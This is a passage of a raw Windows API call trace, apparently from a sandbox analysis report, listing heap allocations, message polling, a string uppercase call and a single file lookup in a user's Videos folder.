hHeap=0x2af0000) returned 1 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafa8 | out: hHeap=0x2af0000) returned 1 [0212.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0212.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7000 [0212.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a75068 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab068 | out: hHeap=0x2af0000) returned 1 [0212.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.625] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xd0) returned 0x29f7878 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75068 | out: hHeap=0x2af0000) returned 1 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae88 | out: hHeap=0x2af0000) returned 1 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7000 | out: hHeap=0x2af0000) returned 1 [0212.625] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0212.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a719b8 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafa8 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71a18 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaea0 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0212.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaafc0 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cd8 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a88 [0212.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf48 | out: hHeap=0x2af0000) returned 1 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf48 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ac8 [0212.626] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0c8 [0212.626] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0212.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab068 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0212.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaeb8 | out: hHeap=0x2af0000) returned 1 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab080 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0212.627] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0212.627] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0212.627] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0212.627] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0212.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0212.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0212.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0212.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb80 [0212.628] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb80 | out: hHeap=0x2af0000) returned 1 [0212.628] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0212.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab128 | out: hHeap=0x2af0000) returned 1 [0212.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0212.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0212.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0212.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0212.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0f8 | out: hHeap=0x2af0000) returned 1 [0212.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0212.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0212.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.628] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.628] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0212.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0212.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0212.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.629] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0212.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b18 [0212.629] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0212.629] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0212.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab200 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71bb8 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0212.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71bb8 | out: hHeap=0x2af0000) returned 1 [0212.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab200 | out: hHeap=0x2af0000) returned 1 [0212.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0212.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0212.630] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c38 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.630] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ba8 [0212.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ba8 | out: hHeap=0x2af0000) returned 1 [0212.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0212.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0212.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0212.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.631] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3e0 [0212.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0212.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3e0 | out: hHeap=0x2af0000) returned 1 [0212.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0212.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3c8 [0212.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab410 [0212.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b08 [0212.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0212.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c08 [0212.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0212.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ee0 [0212.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab428 [0212.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0212.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0212.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.631] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3c8 | out: hHeap=0x2af0000) returned 1 [0212.631] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.631] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0212.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ca8 [0212.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2d8 | out: hHeap=0x2af0000) returned 1 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab140 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1d0 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d48 [0212.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71d88 [0212.632] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.632] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d88 | out: hHeap=0x2af0000) returned 1 [0212.632] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/kmyLNxqbxySO-S_H2O9.mp4", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6658ee30, ftCreationTime.dwHighDateTime=0x1d5ccec, ftLastAccessTime.dwLowDateTime=0xddbbbdd0, ftLastAccessTime.dwHighDateTime=0x1d5d1fc, ftLastWriteTime.dwLowDateTime=0xddbbbdd0, ftLastWriteTime.dwHighDateTime=0x1d5d1fc, nFileSizeHigh=0x0, nFileSizeLow=0x131b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="kmyLNxqbxySO-S_H2O9.mp4", cAlternateFileName="KMYLNX~1.MP4")) returned 0x9e1ab8 [0212.632] FindClose (in: hFindFile=0x9e1ab8 | out: hFindFile=0x9e1ab8) returned 1 [0212.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71d48 | out: hHeap=0x2af0000) returned 1 [0212.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0212.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1d0 | out: hHeap=0x2af0000) returned 1 [0212.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0212.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0212.633] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71af8 [0212.633] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0212.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab308 [0212.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab230 [0212.633] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71c98 [0212.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0212.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71bd8 [0212.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0212.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ce8 [0212.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0212.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab158 [0212.634] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c18 | out: hHeap=0x2af0000) returned 1 [0212.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0212.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab158 | out: hHeap=0x2af0000) returned 1 [0212.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ce8 | out: hHeap=0x2af0000) returned 1 [0212.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab230 | out: hHeap=0x2af0000) returned 1 [0212.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71c98 | out: hHeap=0x2af0000) returned 1 [0212.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77a80 | out: hHeap=0x2af0000) returned 1 [0212.634] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) 